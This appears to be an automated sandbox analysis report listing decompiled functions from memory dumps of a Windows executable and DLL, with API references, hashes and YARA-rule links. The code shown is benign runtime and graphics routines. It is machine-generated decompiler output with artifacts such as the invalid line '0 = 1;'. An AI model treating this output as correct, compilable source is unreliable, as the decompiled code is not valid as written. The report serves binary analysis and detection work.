API String ID: 1710529072-0
Opcode ID: 303d625dbe6cef03ebb764f8a39fc3302658fb04841579ade896593c11526db3
Instruction ID: bcaf39db347c1d90c7623712de0f61de606629f51fcdf8990e7f052139674f4e
Opcode Fuzzy Hash: 303d625dbe6cef03ebb764f8a39fc3302658fb04841579ade896593c11526db3
Instruction Fuzzy Hash: F45106716042258FC720DF68C8846667BF0EB02368F26867ED9A3F72E1D7789815CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403280, Relevance: 7.6, APIs: 5, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403280(int* _a4, int _a8, int* _a12) {
				intOrPtr _v4;
				int _v188;
				intOrPtr _v324;
				intOrPtr _v340;
				void _v344;
				int _t15;
				int _t16;
				int* _t18;
				int* _t19;
				int _t21;
				int* _t28;
				int* _t29;
				int* _t30;

				_v344 = 0x158;
				if(SystemParametersInfoA(0x29, 0x158,  &_v344, 0) == 0) {
					_t15 = GetSystemMetrics(0x5c);
					_t28 = _a12;
					_t21 = _t15;
					if(_t28 != 0) {
						_t15 = GetSystemMetrics(0xf);
						 *_t28 = _t15;
					}
					_t29 = _a4;
					if(_t29 != 0) {
						_t15 = GetSystemMetrics(7) + _t21;
						 *_t29 = _t15;
					}
					_t30 = _a8;
					if(_t30 != 0) {
						_t16 = GetSystemMetrics(4);
						 *_t30 = _t16;
						return _t16;
					}
					goto L13;
				} else {
					_t18 = _a12;
					if(_t18 != 0) {
						 *_t18 = _v188;
					}
					_t19 = _a4;
					if(_t19 != 0) {
						 *_t19 = _v340 + _v4;
					}
					_t15 = _a8;
					if(_t15 == 0) {
						L13:
						return _t15;
					} else {
						 *_t15 = _v324;
						return _t15;
					}
				}
			}

0x00403296
0x004032a6
0x004032f9
0x004032fb
0x00403302
0x00403306
0x0040330a
0x0040330c
0x0040330c
0x0040330e
0x00403317
0x0040331d
0x0040331f
0x0040331f
0x00403321
0x0040332b
0x0040332f
0x00403331
0x00000000
0x00403331
0x00000000
0x004032a8
0x004032a8
0x004032b1
0x004032ba
0x004032ba
0x004032bc
0x004032c5
0x004032d4
0x004032d4
0x004032d6
0x004032df
0x0040333b
0x0040333b
0x004032e1
0x004032e6
0x004032ef
0x004032ef
0x004032df

APIs

SystemParametersInfoA.USER32 ref: 0040329E
GetSystemMetrics.USER32 ref: 004032F9
GetSystemMetrics.USER32 ref: 0040330A
GetSystemMetrics.USER32 ref: 0040331B
GetSystemMetrics.USER32 ref: 0040332F

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$InfoParameters
String ID:
API String ID: 3136151823-0
Opcode ID: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
Instruction ID: 4f0a499fe05242b0b8db50700348c8926cdac99036846cfd25217758564b63bb
Opcode Fuzzy Hash: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
Instruction Fuzzy Hash: CF114C35308741DFE3209F59DC80BEBBBE8AFC4751F14442AA988AB380DB7598048B96

Uniqueness

Uniqueness Score: -1.00%

Function 10019390, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAD0(_a4);
				_t18 = E1000CAD0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAD0(_a8);
						_t21 = E1000CAD0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x10019390
0x10019390
0x1001939b
0x100193a9
0x100193ae
0x100193b3
0x100193be
0x100193c1
0x100193dc
0x100193e0
0x100193f1
0x100193f6
0x100193fb
0x00000000
0x00000000
0x10019412
0x10019417
0x1001941c
0x100193d0
0x100193d9
0x00000000
0x100193d9
0x00000000
0x1001941e
0x00000000
0x10019427
0x00000000

APIs

_strlen.LIBCMT ref: 1001939B
_strlen.LIBCMT ref: 100193A9
_strlen.LIBCMT ref: 100193E0
_strlen.LIBCMT ref: 100193F1
_strlen.LIBCMT ref: 10019401

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792

Uniqueness

Uniqueness Score: -1.00%

Function 10019730, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019730(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAD0(_a4);
					_t21 = E1000CAD0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAD0(_a4);
							_t24 = E1000CAD0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E8FF(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAD0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}

0x10019730
0x10019730
0x10019737
0x10019742
0x10019756
0x10019764
0x10019769
0x1001976e
0x10019770
0x10019782
0x10019786
0x10019794
0x10019799
0x100197a1
0x00000000
0x00000000
0x100197bb
0x100197c0
0x100197c5
0x1001977f
0x00000000
0x100197c7
0x100197c7
0x100197c7
0x00000000
0x100197c5
0x10019782
0x1001976e
0x100197d2
0x100197d9

APIs

_strlen.LIBCMT ref: 10019756
_strlen.LIBCMT ref: 10019764
_strlen.LIBCMT ref: 10019786
_strlen.LIBCMT ref: 10019794
_strlen.LIBCMT ref: 100197A7

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
Instruction ID: 99576d049c222a76ac79d86fac94021c753d4d4845e8680ecbc727badbbf4d85
Opcode Fuzzy Hash: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
Instruction Fuzzy Hash: 8511A7B9D1420CABEB10CFA4D845B9E77E4EF042A8F008165FC0B9B641E635EA94C782

Uniqueness

Uniqueness Score: -1.00%

Function 00401250, Relevance: 7.5, APIs: 5, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401250(intOrPtr _a4) {
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t29;

				_t29 = _a4;
				_t14 =  *((intOrPtr*)(_t29 + 0x2c));
				if( *((intOrPtr*)(_t29 + 0x2c)) != 0) {
					E00403650(_t14);
					 *((intOrPtr*)(_t29 + 0x2c)) = 0;
				}
				_t15 =  *(_t29 + 0xc);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 =  *(_t29 + 0x18);
				 *(_t29 + 0xc) = 0;
				if(_t16 != 0) {
					DeleteObject(_t16);
				}
				_t17 =  *(_t29 + 0x1c);
				 *(_t29 + 0x18) = 0;
				if(_t17 != 0) {
					DeleteObject(_t17);
				}
				_t18 =  *(_t29 + 0x20);
				 *(_t29 + 0x1c) = 0;
				if(_t18 != 0) {
					DeleteObject(_t18);
				}
				_t19 =  *(_t29 + 0x24);
				 *(_t29 + 0x20) = 0;
				if(_t19 != 0) {
					DeleteObject(_t19);
				}
				 *(_t29 + 0x24) = 0;
				return 0;
			}

0x00401252
0x00401259
0x0040125e
0x00401261
0x00401269
0x00401269
0x0040126c
0x00401277
0x0040127a
0x0040127a
0x0040127c
0x0040127f
0x00401284
0x00401287
0x00401287
0x00401289
0x0040128c
0x00401291
0x00401294
0x00401294
0x00401296
0x00401299
0x0040129e
0x004012a1
0x004012a1
0x004012a3
0x004012a6
0x004012ab
0x004012ae
0x004012ae
0x004012b0
0x004012b8

APIs

DeleteObject.GDI32(?), ref: 0040127A
DeleteObject.GDI32(?), ref: 00401287
DeleteObject.GDI32(?), ref: 00401294
DeleteObject.GDI32(?), ref: 004012A1
DeleteObject.GDI32(?), ref: 004012AE

Part of subcall function 00403650: CloseHandle.KERNEL32(?,00401266,?), ref: 00403659

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteObject$CloseHandle
String ID:
API String ID: 4038695863-0
Opcode ID: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
Instruction ID: 8bf31a696b1b558d097ec00c0e5610933454923f565c7d704a328e82ec1086a0
Opcode Fuzzy Hash: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
Instruction Fuzzy Hash: 6801ACB5A00B009FC631DF6ADC84817F7E9BB887503644E6EE489E3751D639E8458B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401330, Relevance: 7.5, APIs: 5, Instructions: 40
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401330(void* _a4, int _a8, int _a12, int _a16, int _a20) {
				int _v0;
				void* _t11;
				struct HDC__* _t22;
				struct HDC__* _t23;

				_t22 = _a4;
				_t23 = CreateCompatibleDC(_t22);
				_t11 = SelectObject(_t23, _a4);
				BitBlt(_t22, _v0, _a4, _a16, _a20, _t23, _a8, _a12, 0xcc0020);
				SelectObject(_t23, _t11);
				return DeleteDC(_t23);
			}

0x00401334
0x00401345
0x0040134d
0x00401376
0x0040137e
0x0040138b

APIs

CreateCompatibleDC.GDI32(?), ref: 00401339
SelectObject.GDI32(00000000,?), ref: 0040134D
BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 00401376
SelectObject.GDI32(00000000,00000000), ref: 0040137E
DeleteDC.GDI32(00000000), ref: 00401381

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$CompatibleCreateDelete
String ID:
API String ID: 488333989-0
Opcode ID: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
Instruction ID: 951521e5306c9743b1bbe3f12aef3e554a535aac35f3b270d8b20651ae45f907
Opcode Fuzzy Hash: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
Instruction Fuzzy Hash: 31F0A972205214BF9240EB59DD84D7FB7ECEFCDAA5B004519F648D3210C731AD058BBA

Uniqueness

Uniqueness Score: -1.00%

Function 1000EAC5, Relevance: 7.5, APIs: 5, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1000EAC5(void* __ebx, void* __edi) {

				E100115F6();
				if(E10014911(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10334590);
					__eax = E1001158A( *0x10335480);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}

0x1000eac5
0x1000eadc
0x1000eae2
0x1000eae3
0x1000eaef
0x1000eaf7
0x1000eaf9
0x1000eb12
0x1000eb13
0x00000000
0x1000eafb
0x1000eafb
0x1000eafc
0x1000eafd
0x1000eb04
0x1000eb0a
0x1000eb0e
0x1000eb2c
0x1000eb2c
0x1000eb2c
0x1000eaf9
0x1000eb31

APIs

___set_flsgetvalue.LIBCMT ref: 1000EAC5

Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619

__calloc_crt.LIBCMT ref: 1000EAD1

Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936

__decode_pointer.LIBCMT ref: 1000EAEF

Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331640), ref: 10011597
Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE

__initptd.LIBCMT ref: 1000EAFD

Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103316C0,0000000C,1001176F,00000000,00000000), ref: 1001166E
Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0

GetCurrentThreadId.KERNEL32 ref: 1000EB04

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
String ID:
API String ID: 1662683381-0
Opcode ID: 97818940081b3572a8cd4e37b72976b450beb0fe731b3ad04c6e54edf7fa5606
Instruction ID: 106076030708d108cc7be60c426ae776d5d8c147d49c5448cdaefb0738cd9b5f
Opcode Fuzzy Hash: 97818940081b3572a8cd4e37b72976b450beb0fe731b3ad04c6e54edf7fa5606
Instruction Fuzzy Hash: B5F02E37204252A9F328E7351C02C4F3784DF827F1721092DF157E80E1EE21D9815560

Uniqueness

Uniqueness Score: -1.00%

Function 00406BC0, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406BC0(void* __ecx, void* __edx) {
				void* __esi;
				void _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;
				void* _t18;

				_t16 = __edx;
				_t11 = __ecx;
				_t17 = GetLastError();
				_t18 = TlsGetValue( *0x40f9fc);
				if(_t18 == 0) {
					_t18 = E00408C2B(_t11, 1, 0x74);
					_pop(_t13);
					if(_t18 == 0 || TlsSetValue( *0x40f9fc, _t18) == 0) {
						_push(0x10);
						E00403CCB(_t13, _t16, _t18);
					} else {
						E00406BAD(_t18);
						_t10 = GetCurrentThreadId();
						 *(_t18 + 4) =  *(_t18 + 4) | 0xffffffff;
						 *_t18 = _t10;
					}
				}
				SetLastError(_t17);
				return _t18;
			}

0x00406bc0
0x00406bc0
0x00406bce
0x00406bd6
0x00406bda
0x00406be5
0x00406bea
0x00406beb
0x00406c13
0x00406c15
0x00406bfe
0x00406bff
0x00406c05
0x00406c0b
0x00406c0f
0x00406c0f
0x00406beb
0x00406c1c
0x00406c26

APIs

GetLastError.KERNEL32(00000001,00000000,004087E8,00406EDD,0040371B,00403E04,0790A300,00000000,00000001,?,00000000), ref: 00406BC2
TlsGetValue.KERNEL32(?,00000000), ref: 00406BD0
SetLastError.KERNEL32(00000000,?,00000000), ref: 00406C1C

Part of subcall function 00408C2B: HeapAlloc.KERNEL32(00000008,00000000,00000000,00000000,0790A300,00000000), ref: 00408D21

TlsSetValue.KERNEL32(00000000,?,00000000), ref: 00406BF4
GetCurrentThreadId.KERNEL32 ref: 00406C05

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
Instruction ID: 2403d90e008a7af22ec6c7de5fb275aeee1f8d1f1e2512a8fb4e243af935bce0
Opcode Fuzzy Hash: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
Instruction Fuzzy Hash: D4F0F6325056119BE7312B30BE0975B3A64EF41771711053AFAD2FA2D1DB388C418ADC

Uniqueness

Uniqueness Score: -1.00%

Function 004046E3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004046E3() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x40b2d8;
					_v20 =  *0x40b2d0;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x40b210]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x004046ee
0x004046f0
0x00404707
0x004046b1
0x004046ba
0x004046c6
0x004046c9
0x004046cf
0x004046d5
0x004046d7
0x004046d8
0x004046e2
0x004046da
0x004046dc
0x004046de
0x004046de
0x004046f2
0x004046f8
0x00404700
0x00000000
0x00404702
0x00404702
0x00404706
0x00404706
0x00404700

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040372C), ref: 004046E8
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004046F8

Strings

KERNEL32, xrefs: 004046E3
IsProcessorFeaturePresent, xrefs: 004046F2

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
Instruction ID: 70ff292064885587df23f269df437abca73237b64940ec06351548063b4fbea1
Opcode Fuzzy Hash: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
Instruction Fuzzy Hash: 9FC012A0341301A6E91017B24C4EB2B2544EB81B41F14087AA115F11C0DB7CD000546D

Uniqueness

Uniqueness Score: -1.00%

Function 00406EF0, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406EF0(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x411d60 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E00406E18(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E004087E3())) = 0x1c;
								_t73 = E004087EC();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00408770(_a4);
						} else {
							 *((intOrPtr*)(E004087E3())) = 9;
							_t73 = E004087EC();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x00406efc
0x00406f01
0x00406f04
0x00406f07
0x00406f16
0x00406f28
0x00406f2b
0x00406f30
0x00406f38
0x00406f3d
0x00406f42
0x00406f44
0x00406f48
0x0040701c
0x00407022
0x00407024
0x00407037
0x00407026
0x00407029
0x0040702c
0x0040702c
0x00406fd8
0x00406fd8
0x00406fdb
0x00406fdd
0x00407073
0x00407073
0x00000000
0x00407073
0x00406fe3
0x00406fe6
0x0040704a
0x0040704a
0x0040704c
0x00407051
0x0040705f
0x00407064
0x0040706a
0x0040706f
0x00407045
0x00000000
0x00407045
0x00407056
0x00407059
0x00000000
0x00000000
0x00000000
0x00407059
0x00406fea
0x00406feb
0x00406fee
0x0040703f
0x00406ff0
0x00406ff5
0x00406ffb
0x00407000
0x00407000
0x00000000
0x00406fee
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f60
0x00406f60
0x00406f60
0x00406f66
0x00406f6c
0x00406f6f
0x00000000
0x00000000
0x00406f74
0x00406f77
0x00406f79
0x00406f7c
0x00406f7e
0x00406f81
0x00406f84
0x00406f84
0x00406f84
0x00406f85
0x00406f87
0x00406f92
0x00406f92
0x00406fa2
0x00406fb7
0x00406fbd
0x00406fbf
0x0040700a
0x00000000
0x0040700a
0x00406fc1
0x00406fc4
0x00406fc7
0x00406fc9
0x00000000
0x00000000
0x00406fd1
0x00406fd1
0x00406fd6
0x00406fd6
0x00000000
0x00406fd6
0x00406f09
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000000,0790A300), ref: 00406FB7

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 524f1c695f1160f68b5294df42e5c05ff8f1d2ed090cbbe519f1d9c4e8f21ccd
